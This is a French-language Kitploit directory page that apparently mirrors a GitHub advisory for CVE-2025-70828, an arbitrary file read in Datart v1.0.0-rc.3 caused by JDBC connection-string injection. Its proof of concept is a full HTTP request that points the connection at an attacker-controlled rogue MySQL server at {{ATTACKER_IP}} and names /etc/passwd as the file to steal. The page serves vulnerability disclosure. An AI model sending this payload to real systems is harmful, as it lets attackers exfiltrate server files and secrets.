Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-70828 — Datart v1.0.0-rc.3 Injection dans la chaîne de connexion JDBC menant à une lecture arbitraire de fichier | Kitploit
Outils/GitHubGitHub/xiaoxiaoranxxx/cve-2025-70828
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionSécurité des Bases de Données
GitHubxiaoxiaoranxxx/cve-2025-70828

CVE-2025-70828

Datart v1.0.0-rc.3 Injection dans la chaîne de connexion JDBC menant à une lecture arbitraire de fichier

Voir le dépôt
4il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-70828

Résumé

Une vulnérabilité de lecture arbitraire de fichier a été découverte dans Datart v1.0.0-rc.3. L'application ne parvient pas à valider correctement l'URL de connexion JDBC lors de la configuration de la source de données.

Détails de la vulnérabilité

Type de vulnérabilité : Validation d'entrée incorrecte (CWE-20) / Lecture arbitraire de fichier Version affectée : Datart v1.0.0-rc.3 Gravité : Élevée (Potentiel de divulgation d'informations sensibles)

Description

La vulnérabilité existe dans le module de configuration de la source de données. L'application ne nettoie pas strictement le paramètre url dans la configuration JDBC. Un attaquant distant disposant de privilèges pour configurer les sources de données peut injecter des paramètres malveillants (notamment allowLoadLocalInfile=true) dans l'URL JDBC.

En pointant la connexion JDBC vers un serveur MySQL malveillant contrôlé par l'attaquant (Rogue MySQL Server), l'attaquant peut déclencher l'envoi de fichiers locaux du serveur Datart vers le serveur de l'attaquant.

Impact

Une exploitation réussie permet à un attaquant authentifié de lire des fichiers arbitraires du système de fichiers du serveur (ex : , fichiers de configuration, code source), pouvant potentiellement conduire à une compromission du serveur ou à d'autres attaques.

/etc/passwd

Preuve de concept (PoC)

  1. Configuration : L'attaquant met en place un serveur MySQL malveillant capable d'exploiter la fonctionnalité LOAD DATA LOCAL INFILE (ex : en utilisant des outils comme rogue_mysql_server).
  2. Exploitation : L'attaquant envoie la requête suivante au serveur Datart pour tester la connexion :
root@kitploit:~
POST /api/v1/data-provider/test HTTP/1.1
Host: {{TARGET_HOST}}
Content-Type: application/json
Authorization: Bearer {{VALID_JWT_TOKEN}}
Accept: application/json

{
  "name": "cve-poc-test",
  "type": "JDBC",
  "properties": {
    "dbType": "MYSQL",
    "url": "jdbc:mysql://{{ATTACKER_IP}}:{{ATTACKER_PORT}}/test?allowLoadLocalInfile=true&allowUrlInLocalInfile=true&maxAllowedPacket=655360",
    "user": "fileread_/etc/passwd",
    "password": "any_password",
    "driverClass": "com.mysql.cj.jdbc.Driver",
    "serverAggregate": false,
    "enableSpecialSQL": false,
    "enableSyncSchemas": true,
    "syncInterval": "60",
    "properties": {}
  }
}
Télécharger l’outil